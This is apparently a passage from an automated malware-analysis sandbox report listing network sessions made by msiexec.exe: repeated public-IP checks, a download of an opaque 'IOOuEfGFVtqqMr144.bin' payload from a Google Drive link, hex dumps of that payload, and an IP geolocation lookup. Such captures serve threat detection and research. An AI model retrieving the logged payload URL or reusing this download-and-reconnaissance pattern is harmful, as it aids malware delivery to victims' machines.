                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Dec 17, 2024 13:22:03.560493946 CET321INHTTP/1.1 200 OK
                                                                                                                                                          Date: Tue, 17 Dec 2024 12:22:03 GMT
                                                                                                                                                          Content-Type: text/html
                                                                                                                                                          Content-Length: 104
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          X-Request-ID: 0a699b500330406508dcdc89410088a3
                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          6192.168.2.749835193.122.130.0807304C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Dec 17, 2024 13:22:05.352478027 CET151OUTGET / HTTP/1.1
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Dec 17, 2024 13:22:06.465234995 CET321INHTTP/1.1 200 OK
                                                                                                                                                          Date: Tue, 17 Dec 2024 12:22:06 GMT
                                                                                                                                                          Content-Type: text/html
                                                                                                                                                          Content-Length: 104
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          X-Request-ID: b98d5e3997d628b261f3c342863c6097
                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          7192.168.2.749847193.122.130.0807304C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Dec 17, 2024 13:22:08.299333096 CET151OUTGET / HTTP/1.1
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                          Host: checkip.dyndns.org
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Dec 17, 2024 13:22:09.395684958 CET321INHTTP/1.1 200 OK
                                                                                                                                                          Date: Tue, 17 Dec 2024 12:22:09 GMT
                                                                                                                                                          Content-Type: text/html
                                                                                                                                                          Content-Length: 104
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          X-Request-ID: c33ba37b116d4014ac18053f82323c9b
                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          0192.168.2.749752172.217.19.1744437304C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-12-17 12:21:36 UTC216OUTGET /uc?export=download&id=1AHR9UXGQEmybB2M9Xi_vJb2WVyjqg-8D HTTP/1.1
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                          Host: drive.google.com
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          2024-12-17 12:21:36 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                          Content-Type: application/binary
                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                          Date: Tue, 17 Dec 2024 12:21:36 GMT
                                                                                                                                                          Location: https://drive.usercontent.google.com/download?id=1AHR9UXGQEmybB2M9Xi_vJb2WVyjqg-8D&export=download
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                          Content-Security-Policy: script-src 'nonce-tRfoyVIMPXWoTmIoDrxlTQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                          Server: ESF
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                          Connection: close


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1192.168.2.749763142.250.181.974437304C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-12-17 12:21:38 UTC258OUTGET /download?id=1AHR9UXGQEmybB2M9Xi_vJb2WVyjqg-8D&export=download HTTP/1.1
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          Host: drive.usercontent.google.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          2024-12-17 12:21:41 UTC4938INHTTP/1.1 200 OK
                                                                                                                                                          X-GUploader-UploadID: AFiumC6BQmDeTQZWRVvWvh8i3fS3q4KAoZ8dlczu89EsNzd_dBk7Bj8yKrzhpNVljg4XhBYc
                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                          Content-Security-Policy: sandbox
                                                                                                                                                          Content-Security-Policy: default-src 'none'
                                                                                                                                                          Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                          X-Content-Security-Policy: sandbox
                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                          Content-Disposition: attachment; filename="IOOuEfGFVtqqMr144.bin"
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Access-Control-Allow-Credentials: false
                                                                                                                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                                          Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Content-Length: 275520
                                                                                                                                                          Last-Modified: Wed, 27 Nov 2024 10:35:43 GMT
                                                                                                                                                          Date: Tue, 17 Dec 2024 12:21:41 GMT
                                                                                                                                                          Expires: Tue, 17 Dec 2024 12:21:41 GMT
                                                                                                                                                          Cache-Control: private, max-age=0
                                                                                                                                                          X-Goog-Hash: crc32c=x9zC1Q==
                                                                                                                                                          Server: UploadServer
                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                          Connection: close
                                                                                                                                                          2024-12-17 12:21:41 UTC4938INData Raw: 03 41 1b e2 78 0c 98 66 ca 59 19 f0 81 07 a9 41 af bc b7 1b 83 c4 4b 70 10 f7 6f 31 60 1d e5 a0 85 5e 39 be 90 03 d9 d4 c7 b0 35 08 40 02 8b 07 8f 4b e6 49 72 15 f1 67 79 85 10 cc 2b 1e 0d 46 46 a3 33 5d df af 3f 92 82 19 d7 c7 3e 22 de 1c c8 1f 92 ef 77 4e f2 b3 4f b8 22 89 05 0f d3 93 6e 2e 51 38 bf ba d0 7a b1 b5 9d 15 52 55 fb 7d 33 47 b4 69 ac 28 6a 15 84 c1 f1 cc e1 cb bd 58 38 6f a5 a7 65 ac d2 bb 0e a4 58 f1 1d 18 2f 5b fc 21 e5 88 32 dc 53 54 0f 61 14 20 5a ac 3f d4 17 42 2e 4f c4 03 88 2d d5 17 05 bd 17 00 df a6 34 1e db 23 07 82 f7 57 84 29 27 e4 de e0 55 8b 27 0e ef 28 ef bd fb f8 f7 2e 12 41 19 bc d0 30 35 50 96 9b 11 08 3d 31 50 6a 05 1e 5d 31 73 e7 91 e4 90 40 fa 09 72 ce f9 de 3a 5e ba b9 3a 04 d0 ae 20 95 28 38 69 46 64 f8 81 02 a6 99 0b
                                                                                                                                                          Data Ascii: AxfYAKpo1`^95@KIrgy+FF3]?>"wNO"n.Q8zRU}3Gi(jX8oeX/[!2STa Z?B.O-4#W)'U'(.A05P=1Pj]1s@r:^: (8iFd
                                                                                                                                                          2024-12-17 12:21:41 UTC4823INData Raw: 4e 9c 86 47 64 89 b6 d6 58 1e a4 9b e4 93 11 4c 44 ef c7 bc 43 62 12 6a 7c 61 45 36 00 a0 39 97 0a 46 9b dc 3d 97 10 81 74 b3 63 42 43 13 d8 18 4e a4 74 14 23 16 d0 04 01 a3 40 b2 b3 7c cd 1a d2 e8 45 ac b9 51 b6 b5 fc e2 91 15 ce f4 18 c1 de a6 10 61 90 cb 26 7d 75 be 49 6b 09 29 3d f9 1b 33 84 24 b5 cb df e0 ec c6 ba 57 cf 72 63 e2 5c 74 86 26 13 ca 70 c2 ae c7 f6 d3 a1 27 ce be e3 2d f0 45 64 a1 de 38 02 8b cc ad a8 45 c8 c4 8b cf d7 d0 06 4c 05 0e 9f 2a a3 b6 8d d4 de f0 41 34 d3 fd db 5c 19 3b c3 57 ab 7c 9a 8c 23 b4 76 d7 d4 ed da 60 86 16 85 91 52 96 90 e5 59 02 65 71 3f 9f f4 64 c2 67 94 28 bc 21 6a 4a 91 03 6a 70 69 6d 13 69 b1 4a a2 86 2b 5c 46 45 e4 31 7f 84 6d 7a 04 78 7f 82 0a 4e 8e 26 19 46 e9 ba 01 5e 6e b2 e7 cc d9 7f bf 5e d6 de 9b f2 99
                                                                                                                                                          Data Ascii: NGdXLDCbj|aE69F=tcBCNt#@|EQa&}uIk)=3$Wrc\t&p'-Ed8EL*A4\;W|#v`RYeq?dg(!jJjpimiJ+\FE1mzxN&F^n^
                                                                                                                                                          2024-12-17 12:21:41 UTC1322INData Raw: 3f 52 2c 5b ef 5e a6 47 bd 2b 79 45 91 f7 19 74 06 0a ce 37 bd 47 7c 88 2b 4d 3d 5b ec 20 7e 99 3b 78 04 02 69 76 55 40 8e 3d 0b 94 e0 b8 03 20 69 8b 24 c4 d9 a3 c8 59 b8 de 9f 8a a2 bf 96 0d e2 1e cd 55 0b 49 0c 70 76 dd de 7f b9 de 61 ea b9 6c cd 78 3a ff 26 06 14 15 de 25 42 3e cb d3 43 87 39 ad 31 15 0d 54 a2 14 db b9 27 a1 52 93 b0 41 a8 39 9d f4 7f 1d 8b b2 49 88 f2 f1 64 3d df e7 96 4b 6d 97 59 aa c7 ee 72 29 d9 3c 1c e9 41 88 a7 a0 8b d6 b3 1b 59 e4 db 2e 94 c1 c7 a8 5f 59 66 c8 dc 8d f5 a7 34 48 4e 61 f1 7e f0 76 5b 06 53 0b 91 a4 84 b1 3b c8 d3 a0 8a 20 71 16 7d 5c 16 f4 16 8c 55 66 7b 54 f2 45 53 17 3f 03 db 85 b1 90 b4 c2 58 0b 00 c3 be 36 2e b9 a7 72 a9 5a 57 92 cf 11 88 67 5b 5b 6b 98 64 69 de 02 e6 4a 3f ac 73 78 a4 6f 15 18 ac e7 d8 34 31
                                                                                                                                                          Data Ascii: ?R,[^G+yEt7G|+M=[ ~;xivU@= i$YUIpvalx:&%B>C91T'RA9Id=KmYr)<AY._Yf4HNa~v[S; q}\Uf{TES?X6.rZWg[[kdiJ?sxo41
                                                                                                                                                          2024-12-17 12:21:41 UTC1390INData Raw: d6 61 12 fa 39 5e 2f 16 ef 19 46 93 5d cb ce 55 33 e5 fb 37 c1 d4 59 9c a5 b4 90 90 9c 8c cf 41 91 85 14 57 1e d6 39 c1 8a 35 74 44 ef f4 1f 66 78 f1 d9 73 61 3b 94 25 bb 47 bd 0a 46 9d 7e 18 8b cf 40 7b b3 08 e0 6b 66 10 19 44 cb 26 14 23 1c c3 25 1a 2e 00 b2 b3 7d e9 0c a0 1c 80 ad c9 f3 4b a3 d4 56 81 15 c4 56 78 d9 ac 29 04 51 e3 69 b2 64 0b 86 5a 6b 0d 9a 18 e3 41 6b 87 24 cf 62 f0 bd b6 c6 b0 4e ee 0b 17 94 5c 7e e3 42 33 ca 76 c2 a9 f0 91 5e fe 2d ce bf f2 77 f0 45 6a b0 f8 4d 4f fe cc dd dc 5d a7 a3 8f e7 94 bf 6e 46 14 26 ed 6a d0 df 89 fc ea e3 45 32 c2 27 c3 6e 42 65 c3 57 ab 7c bc 8c 1a d3 05 bc de 33 d0 73 80 07 fd a4 3d fa 94 97 04 00 bb 0f 29 a6 73 48 ca 7c 84 b9 bc 32 4e 51 b5 f3 27 69 8b 40 13 69 ba 62 6a fa 5f 42 43 19 4e 05 6d c3 d8 7a
                                                                                                                                                          Data Ascii: a9^/F]U37YAW95tDfxsa;%GF~@{kfD&#%.}KVVx)QidZkAk$bN\~B3v^-wEjMO]nF&jE2'nBeW|3s=)sH|2NQ'i@ibj_BCNmz
                                                                                                                                                          2024-12-17 12:21:41 UTC1390INData Raw: fe 10 a9 15 ba fe 6f 51 24 59 bd d4 9b 5e 29 e7 ac d5 f8 30 11 1c 53 6e 0c 3e 2c f3 c2 51 b1 63 1c 67 2a e4 75 8e ae f5 7e 61 8e 54 5e 8a e9 88 71 bf 4c 38 88 95 8e a0 29 2d e4 a0 dc 55 8b 73 38 26 28 a3 b6 eb f0 50 9a 82 27 1d ce 87 32 35 20 80 b3 70 08 3f 3a 4d 95 54 0d 54 3e 7e cb 9d e1 98 57 95 c3 72 ce 0d e5 3e 75 b1 99 2b 0c c6 81 ee 95 28 32 29 46 75 d0 ff 3c a6 9b 0f b0 7f 2a 41 c8 20 7b 42 0e c3 50 9e 7e ee 33 fe 9a 3e b3 3d d5 c9 a0 18 fe 99 dc 12 0e df fa 11 0e 2f 07 ed 15 cd bc 93 cb cf 7a 25 86 89 57 0e a4 fb b3 b2 b4 40 90 9c 80 6d ba 99 d2 b2 6c 1e a6 91 f7 99 4b 64 26 ef f0 b7 9d 62 83 6b 7c 1f 7e 36 00 a4 4b c0 08 46 e9 ca 15 16 bd 80 7e a5 86 43 50 18 01 12 77 6f 7b 14 23 68 fb 04 01 a7 68 59 b3 7c c6 09 de 96 a4 ad b9 55 1c 86 ed e2 f1
                                                                                                                                                          Data Ascii: oQ$Y^)0Sn>,Qcg*u~aT^qL8)-Us8&(P'25 p?:MTT>~Wr>u+(2)Fu<*A {BP~3>=/z%W@mlKd&bk|~6KF~CPwo{#hhY|U
                                                                                                                                                          2024-12-17 12:21:41 UTC1390INData Raw: 4d e9 6e 88 8f a4 04 6c e7 93 23 e5 ba 78 71 e6 24 fa d4 2a 9b 4c 1f a8 39 e1 3d bc 28 77 1c 72 f5 8b 6b 14 6b 4f eb 46 70 e0 0f 18 75 ea b7 4f 0b 16 8f c3 95 26 43 c4 fa 44 b2 39 5d a0 00 e7 6d 99 6d 13 60 c2 66 cd 77 64 43 b5 73 59 9a 72 e2 d8 13 b7 49 c8 46 6a 0a dc b5 23 98 af 3f 96 ae 1d d7 c7 c7 b2 67 1c 70 15 e0 c7 62 4e 82 9b 54 b8 22 83 7b 44 d3 93 6a 06 1b 38 bf b0 ae 65 b1 b5 99 3d 18 55 fb 77 91 53 a0 7d 84 92 6a 15 8e b5 72 cc 61 ca b1 58 3e 02 8f b9 65 68 b4 cd 2f 1c 53 bd d8 47 39 33 95 56 bb bb 40 b3 30 55 d2 0c 34 49 54 7f 51 bb 69 62 64 70 e4 71 f7 5e 78 3e 6b 9d 52 6a 9a f4 45 64 bf 36 8b aa ed 75 14 29 27 ee 7c c5 4d f9 f9 44 ef 58 01 99 e1 86 16 ab 82 23 bb 99 ca 42 87 5f 96 eb 53 2d 24 4e 47 6b 55 1a 32 c1 77 e7 9b 52 b5 5c 88 41 66
                                                                                                                                                          Data Ascii: Mnl#xq$*L9=(wrkkOFpuO&CD9]mm`fwdCsYrIFj#?gpbNT"{Dj8e=UwS}jraX>eh/SG93V@0U4ITQibdpq^x>kRjEd6u)'|MDX#B_S-$NGkU2wR\Af
                                                                                                                                                          2024-12-17 12:21:41 UTC1390INData Raw: f7 0f a2 26 55 11 d5 40 81 85 30 46 63 13 53 18 2a cc d6 21 c2 d9 21 37 91 94 c5 52 e8 d0 de 17 6d 39 e3 49 41 b6 1a 5e c8 3b 4d a3 b2 d9 84 b9 73 d1 08 1b 22 b8 83 84 38 90 02 5e 11 5a 8d 11 af cc 31 03 b6 21 aa bc b1 44 ff 6a 56 b2 48 a1 e8 70 80 a3 78 b6 15 64 14 02 d9 eb e7 f4 3d 07 e7 bf 0f 6a 37 bc 0c 1a da 46 e9 a8 e7 18 cb 17 e5 b6 ed 46 30 a4 1e 99 76 c1 6a ea 1d 5d 61 9e ba 5c ae d2 d5 d5 ca 20 2b 3e 9a b4 c2 ef 58 58 24 71 f9 2d 76 7c da 89 50 54 05 dd 88 8f 8e a6 49 ec e1 29 eb ba 08 d7 a1 bf fa d4 2a 4b 3e 6b a8 49 fd 06 23 5a ad 03 64 7b f6 7e 12 52 e9 c4 0f 70 9e 36 6a bd fc c5 68 21 54 ff d5 bb b6 5d d5 e4 7a 08 38 56 a1 39 1e ed 98 6d 07 95 bf 52 cd 76 46 7d aa 73 7b 8a 20 f2 d2 bd a0 c4 cb 46 6a 75 cd a3 5d d8 dd 68 90 86 69 c1 ef 40 dd
                                                                                                                                                          Data Ascii: &U@0FcS*!!7Rm9IA^;Ms"8^Z1!DjVHpxd=j7FF0vj]a\ +>XX$q-v|PTI)*K>kI#Zd{~Rp6jh!T]z8V9mRvF}s{ Fju]hi@
                                                                                                                                                          2024-12-17 12:21:41 UTC1390INData Raw: 39 a2 38 a1 89 f2 1a 4e e6 3c 62 31 d2 aa c8 bc cf a8 ae cb 09 8a 01 62 4c 79 b5 84 71 04 2d df c1 71 60 17 b0 df 41 39 46 66 41 18 f4 74 a8 17 05 0c 86 dd 02 99 6e ea 60 99 df 1a 85 86 5d 78 30 8f f6 dc df 83 b1 cd c1 43 49 77 6d 63 90 6a 18 f6 54 24 e9 be 38 16 1e f6 d4 d0 40 61 b1 17 e7 7a b6 a6 3c 7e ab 3c d0 d2 87 a7 db b8 74 50 6b c5 0f cd 95 d0 b3 27 f2 54 66 3d 1a 94 45 b0 a0 d8 24 53 12 da d8 39 6d 6d 83 82 f4 57 06 80 60 f5 4b 3d 9b bd 8c 08 3b f7 0f a2 4b 74 00 c9 2b 95 43 30 4c 7a 0e 53 03 37 fd c6 21 b8 f1 84 2d fe 34 b7 e2 f2 d0 bf 24 59 e2 e3 43 24 71 1a 66 01 3b 5c a4 af 54 d2 91 05 d0 2d 07 50 a4 95 88 48 32 0f 3e 39 ee 87 11 b9 e3 54 1b c4 ae 80 aa b3 2b d1 73 58 a2 09 a1 ec d4 07 9c 1d f3 53 64 64 a4 5e d5 81 a6 d1 16 e3 6d 02 36 45 f4
                                                                                                                                                          Data Ascii: 98N<b1bLyq-q`A9FfAtn`]x0CIwmcjT$8@az<~<tPk'Tf=E$S9mmW`K=;Kt+C0LzS7!-4$YC$qf;\T-PH2>9T+sXSdd^m6E
                                                                                                                                                          2024-12-17 12:21:41 UTC1390INData Raw: cf 29 66 d4 cd 2c 23 38 f2 dd ac 46 18 10 b5 22 d5 d7 4d 67 16 b0 82 d6 72 0b b5 6b 41 db cf ef d4 b3 8f 2b 4a 42 39 ba 8c a0 63 2e 79 08 80 43 88 8a 56 4d be d0 b8 29 d2 10 06 8f 69 b5 9c fc eb a3 55 22 ce 29 14 19 d1 3d 4f fb 2f dc 13 87 aa 0e f0 95 5d a0 6f bd b1 4b c8 72 34 d6 75 54 bf 12 1a b6 b0 d4 e0 91 98 fa f5 b0 ab c3 1e 14 33 80 9a 2b 63 1b ab dc fd 3b 54 5f b4 4b df b9 db d8 e8 ef 9e 0d b7 0b 76 e1 6d 75 48 39 5b fa 67 61 74 91 5b 43 8c 1c e2 29 87 1a 95 80 9d ba 5d c2 36 4a 8d de aa cb 4e c8 a1 c1 ca 77 bd 0b 62 94 d5 f1 a3 59 40 3b f7 4a 62 64 1d 8e 43 40 2a 69 aa 07 32 a8 69 25 57 05 72 b5 f8 14 ef 20 ab 62 e9 0d 29 ba 2f e9 78 3a 93 aa f8 d4 f4 2e c7 f8 f9 e9 52 74 63 87 6a 18 f6 84 30 f1 cc 73 03 36 07 76 f5 51 09 6f 16 f4 78 05 85 19 3c
                                                                                                                                                          Data Ascii: )f,#8F"MgrkA+JB9c.yCVM)iU")=O/]oKr4uT3+c;T_KvmuH9[gat[C)]6JNwbY@;JbdC@*i2i%Wr b)/x:.Rtcj0s6vQox<
                                                                                                                                                          2024-12-17 12:21:41 UTC1390INData Raw: 32 44 ed f2 6c a0 43 7e 6b 88 6a 01 fb 57 05 7d 11 5b 49 12 0b 0d ea ea ce 3c a3 c9 e8 50 37 04 5a cb e7 15 83 ac 4b 86 60 54 ec 23 d5 50 62 eb b5 12 83 7d e6 ca b1 ef 84 4a 80 e0 27 2f d8 ea df 22 ab dd 18 50 58 a5 52 4d d3 02 3a 6f 38 47 74 95 f4 e0 41 4c 25 49 c6 65 8e 45 fb d6 53 2b 69 03 43 86 87 bf f8 fe 94 2e c2 10 20 9c b3 24 d8 6a 8e d3 14 4c 92 18 d4 64 21 0f 73 3e 6a 76 f7 0a 31 23 f1 c1 35 d6 2a 67 74 7f 95 a8 a8 e3 cf d6 20 47 3d 5d 35 51 4e 6d 11 f2 ea f5 2c 22 19 46 8a 8a 22 23 63 17 77 60 da e2 19 36 ba 20 f7 c8 5c 27 16 09 bd 6d ba 6f e5 c2 2b 4a 4c f4 c3 96 d2 52 3e 5b 63 af 26 93 f4 77 68 a8 a6 40 1b ce 12 ec bc 7e ed 8a d4 9e a9 f7 0d c5 4e e4 20 d1 4d e9 ac 04 b3 2b f7 bc 22 d3 b0 47 d8 42 40 b0 28 7c 4b 57 ef a3 5e ac 31 1a b6 b0 d4
                                                                                                                                                          Data Ascii: 2DlC~kjW}[I<P7ZK`T#Pb}J'/"PXRM:o8GtAL%IeES+iC. $jLd!s>jv1#5*gt G=]5QNm,"F"#cw`6 \'mo+JLR>[c&wh@~N M+"GB@(|KW^1


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          2192.168.2.749784104.21.67.1524437304C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-12-17 12:21:47 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          2024-12-17 12:21:48 UTC878INHTTP/1.1 200 OK
                                                                                                                                                          Date: Tue, 17 Dec 2024 12:21:48 GMT
                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                          Content-Length: 362
                                                                                                                                                          Connection: close
                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                          Age: 426877
                                                                                                                                                          Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=It0h6fDo8owk92j5F12lRGghmCD7hmfJ%2B9P4NO5%2ByBvIAWGe%2FqLch9zLrKfF6aFRco3xWQ8B%2FyO3uXrvk71XcAQXdc7DORDVg1zmWJpRPEomlECMF7EqmaYeE6qLPVWuF3xUBEOV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8f36dffee8dc41f2-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1709&min_rtt=1704&rtt_var=649&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1672394&cwnd=229&unsent_bytes=0&cid=d9870dd42ac2360d&ts=458&x=0"
                                                                                                                                                          2024-12-17 12:21:48 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
